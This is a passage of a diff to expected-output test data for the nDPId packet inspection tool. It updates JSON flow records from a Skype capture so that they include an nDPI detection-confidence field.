-00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970655837,"flow_last_seen":1431970655837,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.33","src_port":13021,"dst_port":40002,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970657867,"flow_last_seen":1431970657867,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.42","src_port":13021,"dst_port":40005,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970681005,"flow_last_seen":1431970681005,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.43","src_port":13021,"dst_port":40006,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970679995,"flow_last_seen":1431970679995,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.29","src_port":13021,"dst_port":40010,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970649778,"flow_last_seen":1431970649778,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.25","src_port":13021,"dst_port":40010,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970683987,"flow_last_seen":1431970683987,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.17","src_port":13021,"dst_port":40013,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970669927,"flow_last_seen":1431970669927,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.38","src_port":13021,"dst_port":40015,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970670941,"flow_last_seen":1431970670941,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.40","src_port":13021,"dst_port":40017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970648822,"flow_last_seen":1431970648822,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.19","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970657867,"flow_last_seen":1431970657867,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.13","src_port":13021,"dst_port":40021,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970645790,"flow_last_seen":1431970645790,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.27","src_port":13021,"dst_port":40025,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970653869,"flow_last_seen":1431970653869,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.15","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970651850,"flow_last_seen":1431970651850,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.12","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970649777,"flow_last_seen":1431970649777,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.39","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970658879,"flow_last_seen":1431970658879,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.24","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970658879,"flow_last_seen":1431970658879,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.16","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970659834,"flow_last_seen":1431970659834,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.20","src_port":13021,"dst_port":40033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1431970687262,"flow_last_seen":1431970707409,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":18,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"83.31.12.173","src_port":13021,"dst_port":23939,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970655837,"flow_last_seen":1431970655837,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.33","src_port":13021,"dst_port":40002,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970657867,"flow_last_seen":1431970657867,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.42","src_port":13021,"dst_port":40005,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970681005,"flow_last_seen":1431970681005,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.43","src_port":13021,"dst_port":40006,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970679995,"flow_last_seen":1431970679995,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.29","src_port":13021,"dst_port":40010,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970649778,"flow_last_seen":1431970649778,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.25","src_port":13021,"dst_port":40010,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970683987,"flow_last_seen":1431970683987,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.17","src_port":13021,"dst_port":40013,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970669927,"flow_last_seen":1431970669927,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.38","src_port":13021,"dst_port":40015,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970670941,"flow_last_seen":1431970670941,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.40","src_port":13021,"dst_port":40017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970648822,"flow_last_seen":1431970648822,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.19","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970657867,"flow_last_seen":1431970657867,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.13","src_port":13021,"dst_port":40021,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970645790,"flow_last_seen":1431970645790,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.27","src_port":13021,"dst_port":40025,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970653869,"flow_last_seen":1431970653869,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.15","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970651850,"flow_last_seen":1431970651850,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.12","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970649777,"flow_last_seen":1431970649777,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.39","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970658879,"flow_last_seen":1431970658879,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.24","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970658879,"flow_last_seen":1431970658879,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.16","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970659834,"flow_last_seen":1431970659834,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.20","src_port":13021,"dst_port":40033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431970634729,"flow_last_seen":1431970661287,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":245,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":59113,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970687670,"flow_last_seen":1431970706351,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":235,"flow_avg_l4_payload_len":13,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":51289,"dst_port":18767,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970687670,"flow_last_seen":1431970706351,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":235,"flow_avg_l4_payload_len":13,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":51289,"dst_port":18767,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -993,16 +992,16 @@
 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":30,"flow_first_seen":1431970688781,"flow_last_seen":1431970693454,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":2900,"flow_avg_l4_payload_len":96,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":51292,"dst_port":18767,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431970634276,"flow_last_seen":1431970660781,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":55028,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1431970690191,"flow_last_seen":1431970705014,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":1336,"flow_avg_l4_payload_len":111,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.206.33.166","src_port":51295,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
